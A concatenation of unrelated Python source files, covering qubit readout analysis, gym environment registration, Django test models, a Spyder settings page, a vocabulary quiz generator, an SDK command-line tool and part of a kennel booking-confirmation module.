- dephasing_amplitude_key (string) - key of the coherence amp in the hdf5 file
e.g. 'Analysis.Fitted Params lin_trans w0.amplitude.value'
- dephasing_phase_key: (string) - key of the coherence phase in the hdf5 file
e.g. 'Analysis.Fitted Params lin_trans w0.phase.value'
'''
def __init__(self, t_start: str = None, t_stop: str = None, label: str = '_dephasing',
options_dict: dict = None, extract_only: bool = False, auto: bool = True,
close_figs: bool = True, do_fitting: bool = True):
super().__init__(t_start=t_start, t_stop=t_stop,
label=label,
options_dict=options_dict,
do_fitting=do_fitting,
close_figs=close_figs,
extract_only=extract_only
)
sa = self.options_dict.get('scaling_amp_key_dephasing', 'Instrument settings.RO_lutman.M_amp_R0')
rak = self.options_dict.get('dephasing_amplitude_key', 'Analysis.Fitted Params lin_trans w0.amplitude.value')
rap = self.options_dict.get('dephasing_phase_key', 'Analysis.Fitted Params lin_trans w0.phase.value')
self.params_dict = {'scaling_amp': sa,
'dephasing': rak,
'phase': rap,
}
self.numeric_params = ['scaling_amp', 'dephasing', 'phase']
if auto:
self.run_analysis()
def extract_data(self):
# Load data
super().extract_data()
#todo: we need an option to remove outliers and the reference point
# Set output paths
youngest = np.max(self.raw_data_dict['datetime'])
youngest += datetime.timedelta(seconds=1)
f = '%s_amp_sweep_dephasing' % (youngest.strftime("%H%M%S"))
d = '%s' % (youngest.strftime("%Y%m%d"))
folder = os.path.join(a_tools.datadir, d, f)
self.raw_data_dict['folder'] = [folder]
self.options_dict['analysis_result_file'] = os.path.join(folder, f + '.hdf5')
class SSROAnalysis(ba.BaseDataAnalysis):
def process_data(self):
# Remove None entries
snr = np.array(self.raw_data_dict['SNR'], dtype=float)
amps = np.array(self.raw_data_dict['scaling_amp'], dtype=float)
mask = np.intersect1d(np.where(snr != None), np.where(amps != None))
self.proc_data_dict['scaling_amp'] = amps[mask]
self.proc_data_dict['SNR'] = snr[mask]
self.proc_data_dict['F_a'] = np.array(self.raw_data_dict['F_a'], dtype=float)[mask]
self.proc_data_dict['F_d'] = np.array(self.raw_data_dict['F_d'], dtype=float)[mask]
# Fitting masks
mask = range(0, len(amps))
inv_mask = []
if self.options_dict.get('amp_threshold', False):
mask = np.where(amps < self.options_dict['amp_threshold'])
inv_mask = np.where(amps >= self.options_dict['amp_threshold'])
self.proc_data_dict['fitting_mask'] = mask
self.proc_data_dict['fitting_mask_inv'] = inv_mask
def prepare_fitting(self):
self.fit_dicts = OrderedDict()
SNR = self.proc_data_dict['SNR']
amps = self.proc_data_dict['scaling_amp']
mask = self.proc_data_dict['fitting_mask']
amps = amps[mask]
SNR = SNR[mask]
def line(x, a):
return a * x
gmodel = lmfit.models.Model(line)
gmodel.set_param_hint('a', value=1, min=1e-5, max=100)
para = gmodel.make_params()
self.fit_dicts['snr_fit'] = {
'model': gmodel,
'fit_xvals': {'x': amps},
'fit_yvals': {'data': SNR},
'guess_pars': para,
}
def prepare_plots(self):
t = self.timestamps[0]
amps = self.proc_data_dict['scaling_amp']
name = ''
self.plot_dicts[name + 'amp_vs_SNR_fit'] = {
'title' : t,
'plotfn': self.plot_fit,
'ax_id': name + 'amp_vs_SNR',
'zorder': 5,
'fit_res': self.fit_res['snr_fit'],
'xvals': self.proc_data_dict['scaling_amp'],
'marker': '',
'linestyle': '-',
'setlabel': 'SNR fit',
'do_legend': True,
'color': 'blue',
}
fit_mask = self.proc_data_dict['fitting_mask']
fit_mask_inv = self.proc_data_dict['fitting_mask_inv']
use_ext = len(fit_mask) > 0 and len(fit_mask_inv) > 0
if len(fit_mask) > 0:
label = 'SNR data'
if use_ext:
label += ' (used in fitting)'
self.plot_dicts[name + 'amp_vs_SNR_scatter_fitted'] = {
'title' : t,
'plotfn': self.plot_line,
'ax_id': name + 'amp_vs_SNR',
'zorder': 0,
'xvals': amps[fit_mask],
'xlabel': 'scaling amplitude',
'xunit': 'rel. amp.',
'yvals': self.proc_data_dict['SNR'][fit_mask],
'ylabel': 'SNR',
'yunit': '-',
'marker': 'o',
'linestyle': '',
'setlabel': label,
'do_legend': True,
'color': 'blue',
}
if len(fit_mask_inv) > 0:
label = 'SNR data'
if use_ext:
label += ' (not fitted)'
self.plot_dicts[name + 'amp_vs_SNR_scatter_not_fitted'] = {
'title' : t,
'plotfn': self.plot_line,
'ax_id': name + 'amp_vs_SNR',
'zorder': 0,
'xvals': amps[fit_mask_inv],
'xlabel': 'scaling amplitude',
'xunit': 'rel. amp.',
'yvals': self.proc_data_dict['SNR'][fit_mask_inv],
'ylabel': 'SNR',
'yunit': '-',
'marker': 'x',
'linestyle': '',
'setlabel': label,
'do_legend': True,
'color': 'blue',
}
self.plot_dicts[name + 'amp_vs_Fa'] = {
'title' : t,
'plotfn': self.plot_line,
'zorder': 0,
'ax_id': name + 'amp_vs_F',
'xvals': amps,
'yvals': self.proc_data_dict['F_a'],
'marker': 'x',
'linestyle': '',
'setlabel': '$F_a$ data',
'do_legend': True,
}
self.plot_dicts[name + 'amp_vs_Fd'] = {
'title' : t,
'plotfn': self.plot_line,
'zorder': 1,
'ax_id': name + 'amp_vs_F',
'xvals': amps,
'yvals': self.proc_data_dict['F_d'],
'marker': 'x',
'linestyle': '',
'ylabel': 'Fidelity',
'yunit': '-',
'xlabel': 'scaling amplitude',
'xunit': 'rel. amp.',
'setlabel': '$F_d$ data',
'do_legend': True,
}
class SSROAnalysisSweep(SSROAnalysis):
def __init__(self, t_start: str = None, t_stop: str = None,
label: str = '_ro_amp_sweep_SNR',
options_dict: dict = None, extract_only: bool = False, auto: bool = True,
close_figs: bool = True, do_fitting: bool = True):
super().__init__(t_start=t_start, t_stop=t_start,
label=label,
options_dict=options_dict,
do_fitting=do_fitting,
close_figs=close_figs,
extract_only=extract_only,
)
self.single_timestamp = True
ts = a_tools.get_timestamps_in_range(timestamp_start=t_start,
timestamp_end=t_stop,
label=label,
exact_label_match=True)
if self.verbose:
print('SSROAnalysisSweep', ts)
assert len(ts) == 1, 'Expected a single match, found %d'%len(ts)
self.timestamp = ts[0]
if auto:
self.run_analysis()
def extract_data(self):
self.raw_data_dict = OrderedDict()
data_file = MeasurementAnalysis(timestamp=self.timestamp,
auto=True, TwoD=False)
dateobj = a_tools.datetime_from_timestamp(self.timestamp)
self.timestamps = [self.timestamp]
self.raw_data_dict['timestamps'] = [self.timestamp]
self.raw_data_dict['datetime'] = np.array([dateobj], dtype=datetime.datetime)
temp = data_file.load_hdf5data()
data_file.get_naming_and_values()
self.raw_data_dict['scaling_amp'] = data_file.sweep_points
self.raw_data_dict['SNR'] = np.array(data_file.measured_values[0], dtype=float)
self.raw_data_dict['F_d'] = np.array(data_file.measured_values[1], dtype=float)
self.raw_data_dict['F_a'] = np.array(data_file.measured_values[2], dtype=float)
self.raw_data_dict['folder'] = data_file.folder
class SSROAnalysisSingleScans(SSROAnalysis):
def __init__(self, t_start: str = None, t_stop: str = None,
label: str = '_SSRO', options_dict: dict = None,
extract_only: bool = False, auto: bool = True,
close_figs: bool = True, do_fitting: bool = True):
super().__init__(t_start=t_start, t_stop=t_stop,
label=label,
options_dict=options_dict,
do_fitting=do_fitting,
close_figs=close_figs,
extract_only=extract_only,
)
sa = self.options_dict.get('scaling_amp_key_ssro',
'Instrument settings.RO_lutman.M_amp_R0')
self.params_dict = {'scaling_amp': sa,
'SNR': 'Analysis.SSRO_Fidelity.SNR',
'F_a': 'Analysis.SSRO_Fidelity.F_a',
'F_d': 'Analysis.SSRO_Fidelity.F_d',
}
self.numeric_params = ['scaling_amp', 'SNR', 'F_a', 'F_d']
if auto:
self.run_analysis()
def extract_data(self):
# Load data
super().extract_data()
#todo: we need an option to remove outliers and the reference point
# Set output paths
youngest = np.max(self.raw_data_dict['datetime'])
youngest += datetime.timedelta(seconds=1)
f = '%s_amp_sweep_SNR_optimized' % (youngest.strftime("%H%M%S"))
d = '%s' % (youngest.strftime("%Y%m%d"))
folder = os.path.join(a_tools.datadir, d, f)
self.raw_data_dict['folder'] = [folder]
self.options_dict['analysis_result_file'] = os.path.join(folder, f + '.hdf5')
|
from gym.envs.registration import register
register(
id='reacher_custom-v0',
entry_point='reacher.envs:ReacherCustomEnv',
max_episode_steps=50,
reward_threshold=-3.75,
)
register(
id='reacher_custom-action1-v0',
entry_point='reacher.envs:ReacherCustomAction1Env',
max_episode_steps=50,
reward_threshold=-3.75,
)
register(
id='reacher_custom-action2-v0',
entry_point='reacher.envs:ReacherCustomAction2Env',
max_episode_steps=50,
reward_threshold=-3.75,
)
register(
id='reacher_custom-raction1-v0',
entry_point='reacher.envs:ReacherCustomRAction1Env',
max_episode_steps=50,
reward_threshold=-3.75,
)
register(
id='reacher_custom-raction2-v0',
entry_point='reacher.envs:ReacherCustomRAction2Env',
max_episode_steps=50,
reward_threshold=-3.75,
)
|
from pathlib import Path
TESTS_DATA_PATH = Path(__file__).parent / 'data'
# These are the last 6 digits in the second line in the ".log" files:
EXPECTED_ACQ_TIME = 143828
|
from django.db import models
import secretballot
class Link(models.Model):
url = models.URLField()
secretballot.enable_voting_on(Link)
# used for testing field renames
class WeirdLink(models.Model):
url = models.URLField()
secretballot.enable_voting_on(WeirdLink,
votes_name='vs',
upvotes_name='total_upvs',
downvotes_name='total_downvs',
total_name='v_total',
add_vote_name='add_v',
remove_vote_name='remove_v',
)
# TODO?: base_manager?
# Used for testing custom manager_name
class AnotherLink(models.Model):
url = models.URLField()
secretballot.enable_voting_on(AnotherLink,
manager_name='ballot_custom_manager'
)
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""Run configuration page."""
# Third party imports
from qtpy.QtWidgets import (QButtonGroup, QGroupBox, QHBoxLayout, QLabel,
QVBoxLayout)
# Local imports
from spyder.api.preferences import PluginConfigPage
from spyder.api.translations import get_translation
from spyder.plugins.run.widgets import (ALWAYS_OPEN_FIRST_RUN,
ALWAYS_OPEN_FIRST_RUN_OPTION,
CLEAR_ALL_VARIABLES,
CONSOLE_NAMESPACE,
CURRENT_INTERPRETER,
CURRENT_INTERPRETER_OPTION, CW_DIR,
DEDICATED_INTERPRETER,
DEDICATED_INTERPRETER_OPTION,
FILE_DIR, FIXED_DIR, INTERACT,
POST_MORTEM, SYSTERM_INTERPRETER,
SYSTERM_INTERPRETER_OPTION,
WDIR_FIXED_DIR_OPTION,
WDIR_USE_CWD_DIR_OPTION,
WDIR_USE_FIXED_DIR_OPTION,
WDIR_USE_SCRIPT_DIR_OPTION)
from spyder.utils.misc import getcwd_or_home
# Localization
_ = get_translation("spyder")
class RunConfigPage(PluginConfigPage):
"""Default Run Settings configuration page."""
def setup_page(self):
about_label = QLabel(_("The following are the default options for "
"running files.These options may be overriden "
"using the <b>Configuration per file</b> entry "
"of the <b>Run</b> menu."))
about_label.setWordWrap(True)
interpreter_group = QGroupBox(_("Console"))
interpreter_bg = QButtonGroup(interpreter_group)
self.current_radio = self.create_radiobutton(
CURRENT_INTERPRETER,
CURRENT_INTERPRETER_OPTION,
True,
button_group=interpreter_bg)
self.dedicated_radio = self.create_radiobutton(
DEDICATED_INTERPRETER,
DEDICATED_INTERPRETER_OPTION,
False,
button_group=interpreter_bg)
self.systerm_radio = self.create_radiobutton(
SYSTERM_INTERPRETER,
SYSTERM_INTERPRETER_OPTION, False,
button_group=interpreter_bg)
interpreter_layout = QVBoxLayout()
interpreter_group.setLayout(interpreter_layout)
interpreter_layout.addWidget(self.current_radio)
interpreter_layout.addWidget(self.dedicated_radio)
interpreter_layout.addWidget(self.systerm_radio)
general_group = QGroupBox(_("General settings"))
post_mortem = self.create_checkbox(POST_MORTEM, 'post_mortem', False)
clear_variables = self.create_checkbox(CLEAR_ALL_VARIABLES,
'clear_namespace', False)
console_namespace = self.create_checkbox(CONSOLE_NAMESPACE,
'console_namespace', False)
general_layout = QVBoxLayout()
general_layout.addWidget(clear_variables)
general_layout.addWidget(console_namespace)
general_layout.addWidget(post_mortem)
general_group.setLayout(general_layout)
wdir_group = QGroupBox(_("Working directory settings"))
wdir_bg = QButtonGroup(wdir_group)
wdir_label = QLabel(_("Default working directory is:"))
wdir_label.setWordWrap(True)
dirname_radio = self.create_radiobutton(
FILE_DIR,
WDIR_USE_SCRIPT_DIR_OPTION,
True,
button_group=wdir_bg)
cwd_radio = self.create_radiobutton(
CW_DIR,
WDIR_USE_CWD_DIR_OPTION,
False,
button_group=wdir_bg)
thisdir_radio = self.create_radiobutton(
FIXED_DIR,
WDIR_USE_FIXED_DIR_OPTION,
False,
button_group=wdir_bg)
thisdir_bd = self.create_browsedir("", WDIR_FIXED_DIR_OPTION,
getcwd_or_home())
thisdir_radio.toggled.connect(thisdir_bd.setEnabled)
dirname_radio.toggled.connect(thisdir_bd.setDisabled)
cwd_radio.toggled.connect(thisdir_bd.setDisabled)
thisdir_layout = QHBoxLayout()
thisdir_layout.addWidget(thisdir_radio)
thisdir_layout.addWidget(thisdir_bd)
wdir_layout = QVBoxLayout()
wdir_layout.addWidget(wdir_label)
wdir_layout.addWidget(dirname_radio)
wdir_layout.addWidget(cwd_radio)
wdir_layout.addLayout(thisdir_layout)
wdir_group.setLayout(wdir_layout)
external_group = QGroupBox(_("External system terminal"))
interact_after = self.create_checkbox(INTERACT, 'interact', False)
external_layout = QVBoxLayout()
external_layout.addWidget(interact_after)
external_group.setLayout(external_layout)
firstrun_cb = self.create_checkbox(
ALWAYS_OPEN_FIRST_RUN % _("Run Settings dialog"),
ALWAYS_OPEN_FIRST_RUN_OPTION,
False)
vlayout = QVBoxLayout()
vlayout.addWidget(about_label)
vlayout.addSpacing(10)
vlayout.addWidget(interpreter_group)
vlayout.addWidget(general_group)
vlayout.addWidget(wdir_group)
vlayout.addWidget(external_group)
vlayout.addWidget(firstrun_cb)
vlayout.addStretch(1)
self.setLayout(vlayout)
def apply_settings(self, options):
pass
|
from random import shuffle
from typing import List
from rest_framework.exceptions import APIException
from data.word_pairs import WORD_PAIRS
from game.constants import QUESTIONS_PER_GAME, ANSWERS_PER_QUESTION
from game.game_utils import GameUtils
from game.models import Question, Game
def create_word_questions(game: Game) -> List[Question]:
check_language_pairs_number()
questions = []
for _ in range(QUESTIONS_PER_GAME):
questions.append(get_question_to_create(game, questions))
return questions
def check_language_pairs_number():
min_number_of_pairs = max(ANSWERS_PER_QUESTION, QUESTIONS_PER_GAME)
if len(WORD_PAIRS) < min_number_of_pairs:
raise APIException(
f"Must have at least {min_number_of_pairs} language pairs to "
"create a game"
)
def get_random_language_pair() -> dict:
index = GameUtils.get_random_int(0, len(WORD_PAIRS) - 1)
return WORD_PAIRS[index]
def get_question_to_create(
game: Game, existing_questions: List[Question]
) -> Question:
while True:
question_pair = get_random_language_pair()
existing_question_words = [
question.question for question in existing_questions
]
new_question_word = question_pair["english_word"]
if new_question_word not in existing_question_words:
answer_words = get_question_answers(question_pair)
return Question(
game=game,
question=new_question_word,
correct_answer=question_pair["russian_word"],
answer_words=answer_words,
)
def get_question_answers(question_pair: dict) -> List[str]:
answers = [question_pair["russian_word"]]
for _ in range(ANSWERS_PER_QUESTION - 1):
answers.append(get_wrong_answer(answers))
shuffle(answers)
return answers
def get_wrong_answer(existing_answers: List[str]) -> str:
while True:
random_language_pair = get_random_language_pair()
if random_language_pair["russian_word"] not in existing_answers:
return random_language_pair["russian_word"]
|
from PyQt5.QtWidgets import QListWidgetItem
class InputItem(QListWidgetItem):
pass
|
# Copyright 2021 Zuva Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .config import config
from .ZDAISDK import ZDAISDK
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--get",
type = str,
choices = ["url", "token"],
help = 'Returns the default url used by the wrapper')
parser.add_argument("--set-token",
type = str,
help = 'Sets the default token')
parser.add_argument("--set-url",
type = str,
help = 'Sets the default url')
parser.add_argument("--test",
type = str,
choices = ["connection"],
help = 'Perform an test action')
args = parser.parse_args()
if __name__ == "__main__":
config.create_wrapper_config()
url, token = config.get_access()
if args.get == "token":
if not token:
print(f'No default token found')
else:
print(token)
elif args.get == "url":
if not url:
print(f'No default url found')
else:
print(url)
elif args.set_token:
config.update_wrapper_config(token = args.set_token)
print('Token set')
elif args.set_url:
config.update_wrapper_config(url = args.set_url)
print('Url set')
elif args.test == 'connection':
if any(f == "" for f in [url, token]):
print(f'Unable to perform connection test using default values: either url or token missing.')
exit(1)
sdk = ZDAISDK(from_config = True)
try:
fields, _ = sdk.fields.get()
print(f'Connection test succeeded [Retrieved {len(fields)} fields]')
except Exception as e:
print(f'Connection test failed: {e}')
|
# -*- coding: utf-8 -*-
#===============================================================================
# Author : J.Chapman
# License : BSD
# Date : 4 August 2013
# Description : Python 3 REST server
#===============================================================================
from DefaultHTTPServer import DefaultHTTPServer
from RESTfulHTTPRequestHandler import RESTfulHTTPRequestHandler
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
# create console and file handlers and set log level
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter
formatter = logging.Formatter('%(asctime)s %(threadName)s %(filename)s %(lineno)d [%(levelname)s] : %(funcName)s : %(message)s')
# set formatter for console and file handlers
ch.setFormatter(formatter)
# add console and file handlers to logger
logger.addHandler(ch)
logging.getLogger("DefaultHTTPServer").addHandler(ch)
logging.getLogger("DefaultHTTPRequestHandler").addHandler(ch)
logging.getLogger("RESTfulHTTPRequestHandler").addHandler(ch)
def main():
"""
main program function
"""
SERVER_IP = "0.0.0.0"
SERVER_PORT = 8080
server = DefaultHTTPServer((SERVER_IP, SERVER_PORT), RESTfulHTTPRequestHandler)
print("Starting server, use <Ctrl-C> to stop")
server.serve_forever()
if __name__ == '__main__':
main()
|
from typing import List
def to_header_payload(headers) -> List[dict]:
return [
{'key': key, 'value': value, 'include': True}
for key, value in headers.items()
]
|
"""Cache functions and configuration for styles."""
import re
from datetime import timedelta
from typing import Tuple
from loguru import logger
from nitpick.enums import CachingEnum
REGEX_CACHE_UNIT = re.compile(r"(?P<number>\d+)\s+(?P<unit>(minute|hour|day|week))", re.IGNORECASE)
def parse_cache_option(cache_option: str) -> Tuple[CachingEnum, timedelta]:
"""Parse the cache option provided on pyproject.toml.
If no cache if provided or is invalid, the default is *one hour*.
"""
clean_cache_option = cache_option.strip().lower() if cache_option else ""
mapping = {CachingEnum.NEVER.name.lower(): CachingEnum.NEVER, CachingEnum.FOREVER.name.lower(): CachingEnum.FOREVER}
simple_cache = mapping.get(clean_cache_option)
if simple_cache:
logger.info(f"Simple cache option: {simple_cache.name}")
return simple_cache, timedelta()
default = CachingEnum.EXPIRES, timedelta(hours=1)
if not clean_cache_option:
return default
for match in REGEX_CACHE_UNIT.finditer(clean_cache_option):
plural_unit = match.group("unit") + "s"
number = int(match.group("number"))
logger.info(f"Cache option with unit: {number} {plural_unit}")
return CachingEnum.EXPIRES, timedelta(**{plural_unit: number})
logger.warning(f"Invalid cache option: {clean_cache_option}. Defaulting to 1 hour")
return default
|
from os import getenv, path
from .settings import get_settings
from base64 import b64encode
from datetime import datetime, date
from decimal import Decimal
import time
from .env import log, clean_html
from urllib.request import quote
from mako.template import Template
import webbrowser
class ArgsWrapper():
def __init__(self, dict):
self.dict = dict
def __getattr__(self, attr):
if attr in self.dict:
return self.dict[attr]
else:
return None
def handle_remote_confirmation(data):
code = 1
error_message = ''
try:
bk_no = data['bk_no']
deposit_requested = 'deposit_amount' in data
deposit_amount = 0.0
if deposit_requested:
deposit_amount = data['deposit_amount']
body = data['body']
file_name = data['file_name']
subject = data['subject']
destination = data['email']
fout = f'Z:/Kennels/Confirmations/{file_name}'
f = open(fout, 'w')
f.write(body)
f.close()
handle_confirmation(bk_no, deposit_amount, subject, fout, 0,
destination)
except Exception as e:
code = 0
error_message = str(e)
return code, error_message
def confirm_all(
petadmin, report_parameters, action, asofdate=None,
audit_start=0, additional_text='', forced_subject=''
):
confirmation_candidates = {}
conf_time = datetime.now()
env = petadmin.env
cursor = env.get_cursor()
# start by adding booking fees as necessary
sql = 'Execute padd_booking_fee_new'
env.execute(sql)
petadmin.load()
# next read all past emails sent, to safeguard against double-sending
sql = """
select hist_bk_no, hist_date, hist_destination, hist_subject
from vwhistory2
where hist_report = 'Conf-mail' and hist_type = 'Email Client'
"""
try:
cursor.execute(sql)
except Exception as e:
log.exception(f"Exception executing '{sql}': {str(e)}")
return
past_messages = {}
for row in cursor:
bk_no = row[0]
hist_date = row[1]
destination = row[2]
subject = row[3]
if bk_no not in past_messages:
past_messages[bk_no] = []
past_messages[bk_no].append((hist_date, destination, subject))
if asofdate:
sql = f"""
select a.bk_no, aud_type, aud_action, aud_amount, aud_date,
aud_booking_count, aud_confirm from vwaudit a
join vwbooking b on a.bk_no = b.bk_no
where b.bk_start_date > GETDATE() and
aud_date >= '{asofdate}' order by b.bk_start_date
"""
elif audit_start > 0:
sql = """
select b.bk_no, aud_type, aud_action, aud_amount, aud_date,
aud_booking_count, aud_confirm from vwaudit_orphan a
join vwbooking b on a.aud_key = b.bk_no
where b.bk_start_date > GETDATE() and aud_date >= '{audit_start}'
order by b.bk_start_date
"""
else:
sql = """
select a.bk_no, aud_type, aud_action, aud_amount, aud_date,
aud_booking_count, aud_confirm
from vwrecentaudit a
join vwbooking b on a.bk_no = b.bk_no
where b.bk_start_date > GETDATE()
order by b.bk_start_date
"""
try:
cursor.execute(sql)
except Exception as e:
log.exception("Exception executing '%s': %s", sql, str(e))
return
rows = cursor.fetchall()
for row in rows:
bk_no = row[0]
aud_type = row[1]
aud_action = row[2]
aud_amount = row[3]
aud_date = row[4]
aud_booking_count = row[5]
aud_confirm = row[6]
env.set_key(bk_no, 'B')
log.debug(
f'Processing audit event for booking {bk_no}, type {aud_type}'
f', action {aud_action}'
)
if not aud_confirm:
log.info('Skipping bk_no %d - no confirmation memo' % bk_no)
continue
if bk_no in confirmation_candidates:
cc = confirmation_candidates[bk_no]
else:
cc = ConfirmationCandidate(petadmin, bk_no)
cc.additional_text = additional_text
cc.forced_subject = forced_subject
if not cc.booking:
log.error('Missing booking for bk_no = %d' % bk_no)
continue
if cc.booking.status == 'S':
log.info(
f'Skipping booking #{bk_no} '
f'- status is {cc.booking.status}'
)
continue
if bk_no in past_messages:
cc.past_messages = past_messages[bk_no]
confirmation_candidates[bk_no] = cc
cc.booking = petadmin.bookings.get(bk_no)
cc.add_event(aud_type, aud_action, aud_amount, aud_date)
cc.booking_count = aud_booking_count
env.clear_key()
log.info('Confirming %d candidates', len(confirmation_candidates))
if len(confirmation_candidates) > 0:
conf_time_str = conf_time.strftime('%Y%m%d %H:%M:%S')
sql = (f"Insert into tblconfirm (conf_time, conf_candidates) values"
f"('{conf_time_str}', {len(confirmation_candidates)})")
try:
env.execute(sql)
except Exception as e:
log.exception("Exception executing '%s': %s", sql, str(e))
return
sql = 'Select @@Identity'
try:
cursor.execute(sql)
except Exception as e:
log.exception("Exception executing '%s': %s", sql, str(e))
return
row = cursor.fetchone()
conf_no = row[0]
log.debug(
f'Created confirmation record #{conf_no} with'
f' {len(confirmation_candidates)} candidates')
successfuls = 0
for cc in confirmation_candidates.values():
env.set_key(cc.booking.no, 'B')
log.debug('Processing confirmation candidate')
cc.conf_no = conf_no
try:
cc.generate_confirmation(report_parameters, action)
log.debug('Generate confirmation completed successfully')
successfuls += 1
except Exception as e:
log.exception(
f'Exception when generating confirmation for booking '
f'{cc.booking.no}: {e}')
env.clear_key()
sql = (
f'Update tblconfirm set conf_successfuls = {successfuls}'
f' where conf_no = {conf_no}')
env.execute(sql)
sql = 'Execute pmaintenance'
try:
env.execute(sql)
except Exception as e:
log.exception("Exception executing '%s': %s", sql, str(e))
return
def process_booking(bk_no, args, pa, action, rp, additional_text='',
forced_subject=''):
cc = ConfirmationCandidate(pa, bk_no)
cc.additional_text = additional_text
cc.forced_subject = forced_subject
if args.confirmed:
cc.booking.status = 'V'
if args.deposit is not None:
cc.force_deposit = True
cc.deposit_amount = Decimal(args.deposit)
if args.payment is not None:
cc.payment = True
cc.payment_amount = Decimal(args.payment)
if args.amended:
cc.amended = True
if args.cancel:
cc.cancelled = True
if args.deluxe:
cc.deluxe = True
cc.skip = False
return(cc.generate_confirmation(rp, action))
def handle_confirmation(
env, bk_no, deposit_amount, subject, file_name,
conf_no=0, email=''):
sql = f"Execute pinsert_confaction {conf_no}, {bk_no}, '', '{subject}'" \
f", '{file_name}', {deposit_amount}, '{email}'"
env.execute(sql)
class ReportParameters:
def __init__(self, env):
self.report = path.join(env.image_folder, "Confirmation.html")
self.report_txt = path.join(env.image_folder, "Confirmation.txt")
self.provisional_report = \
path.join(env.image_folder, "PreBooking.html")
self.provisional_report_txt = \
path.join(env.image_folder, "PreBooking.txt")
self.logo_file = path.join(env.image_folder, "Logo.jpg")
self.deluxe_logo_file = \
path.join(env.image_folder, "deluxe_logo_2.png")
self.pay_deposit_file = path.join(env.image_folder, "paydeposit.png")
self.logo_code = None
self.deluxe_logo_code = None
self.deposit_icon = None
self.past_messages = []
# def read_images(self):
# with open(self.logo_file, "rb") as f:
# data = f.read()
# self.logo_code = b64encode(data)
# with open(self.deluxe_logo_file, "rb") as f:
# data = f.read()
# self.deluxe_logo_code = b64encode(data)
# with open(self.pay_deposit_file, "rb") as f:
# data = f.read()
# self.deposit_icon = b64encode(data)
@staticmethod
def get_deposit_url(bk_no, deposit_amount, pet_names, customer, expiry=0):
timestamp = time.mktime(
datetime.combine(date.today(), datetime.min.time()).timetuple())
timestamp += expiry * 24 * 3600
timestamp *= 1000
url = (
"https://secure.worldpay.com/wcc/purchase?instId=1094566&"
f"cartId=PBL-{bk_no}&amount={deposit_amount}¤cy=GBP&")
url += (
f'desc=Deposit+for+Crowbank+booking+%%23{bk_no}+'
f'for+{quote(pet_names)}&accId1=CROWBANKPETBM1&testMode=0')
url += f'&name={quote(customer.display_name())}'
if customer.email != '':
url += f'&email={quote(customer.email)}'
if customer.addr1 != '':
url += f'&address1={quote(customer.addr1)}'
if customer.addr2 != '':
url += f'&address2={quote(customer.addr2)}'
if customer.addr3 != '':
url += f'&town={quote(customer.addr3)}'
if customer.postcode != '':
url += f'&postcode={quote(customer.postcode)}'
url += '&country=UK'
if expiry:
url += f'`{timestamp}'
if customer.telno_home != '':
phone = customer.telno_home
if len(phone) == 6:
phone = '01236 ' + phone
url += '&tel=%s' % quote(phone)
return url
class ConfirmationCandidate:
"""
A class representing a candidate for confirmation generation.
"""
def __init__(self, petadmin, bk_no):
self.bk_no = bk_no
# a new booking - any subsequent amendments are 'swallowed'
self.new = False
# flag determining whether a payment is acknowledged
self.payment = False
# flag determining whether this is an amendment of an existing booking
self.amended = False
self.booking = petadmin.bookings.get(bk_no)
if self.booking:
self.pet_names = self.booking.pet_names()
# flag determining whether a deposit request is necessary
self.deposit = True
self.deposit_amount = Decimal("0.00")
self.conf_no = 0
self.payment_amount = Decimal("0.00")
self.payment_date = None
self.title = ''
self.forced_subject = ''
self.deluxe = False
self.env = petadmin.env
self.booking_count = 0
self.past_messages = []
self.force_deposit = False
self.in_next_year = False
self.next_years_prices = False
self.deposit_url = ''
self.additional_text = ''
if self.booking:
self.cancelled = self.booking.status == 'C'
self.standby = self.booking.status == 'S'
self.skip = (self.booking.skip == 1)
def add_event(self, aud_type, aud_action, aud_amount, aud_date):
if aud_type == 'P' and aud_action == 'A':
self.payment = True
self.payment_amount = aud_amount
self.payment_date = aud_date
elif aud_type == 'B':
if aud_action == 'A':
self.new = True
self.amended = False
elif aud_type == 'A' and not self.new:
self.amended = True
if aud_action == 'C':
self.cancelled = True
def prepare(self, report_parameters=None):
if not self.booking:
return
if self.booking is None:
raise RuntimeError("Missing booking objects")
if self.booking.deluxe == 1:
self.deluxe = True
if not self.force_deposit:
if self.standby:
log.debug('Standby - no deposit')
self.deposit = False
if self.deposit and self.booking.status == 'V':
log.debug('Booking status confirmed - no deposit')
self.deposit = False
if self.deposit and self.booking.paid_amt != Decimal("0.00"):
log.debug('Booking with prior payments - no deposit')
self.deposit = False
if self.deposit and self.booking.customer.nodeposit:
log.debug('Booking with no-deposit customer - no deposit')
self.deposit = False
if self.deposit and self.payment_amount != Decimal("0.00"):
log.debug('Booking associated with payment event - no deposit')
self.deposit = False
if self.deposit:
if self.deposit_amount == Decimal("0.00"):
self.deposit_amount = Decimal("30.00")
for pet in self.booking.pets:
if pet.spec == 'Dog':
self.deposit_amount = Decimal("50.00")
if self.deposit_amount > self.booking.gross_amt / 2:
self.deposit_amount = \
Decimal(round(self.booking.gross_amt, 1) / 2)
# Round down to nearest 0.05
if not report_parameters:
report_parameters = ReportParameters(self.env)
self.deposit_url = \
report_parameters.get_deposit_url(
self.booking.no, self.deposit_amount,
self.booking.pet_names(), self.booking.customer)
if self.cancelled:
self.title = 'Booking Cancellation'
elif self.standby:
self.title = 'Standby Booking'
else:
if self.deposit:
if self.deluxe:
self.title = 'Provisional Deluxe Booking'
else:
self.title = 'Provisional Booking'
else:
if self.deluxe:
self.title = 'Confirmed Deluxe Booking'
else:
self.title = 'Confirmed Booking'
if self.amended:
self.title += ' - Amended'
self.clean_additional_text = clean_html(self.additional_text)
def confirmation_body(self, report_parameters=None, body_format='html'):
if not self.booking:
return
self.pet_names = self.booking.pet_names()
today_date = date.today()
if not report_parameters:
report_parameters = ReportParameters(self.env)
# report_parameters.read_images()
if body_format == 'html':
mytemplate = Template(filename=report_parameters.report)
else:
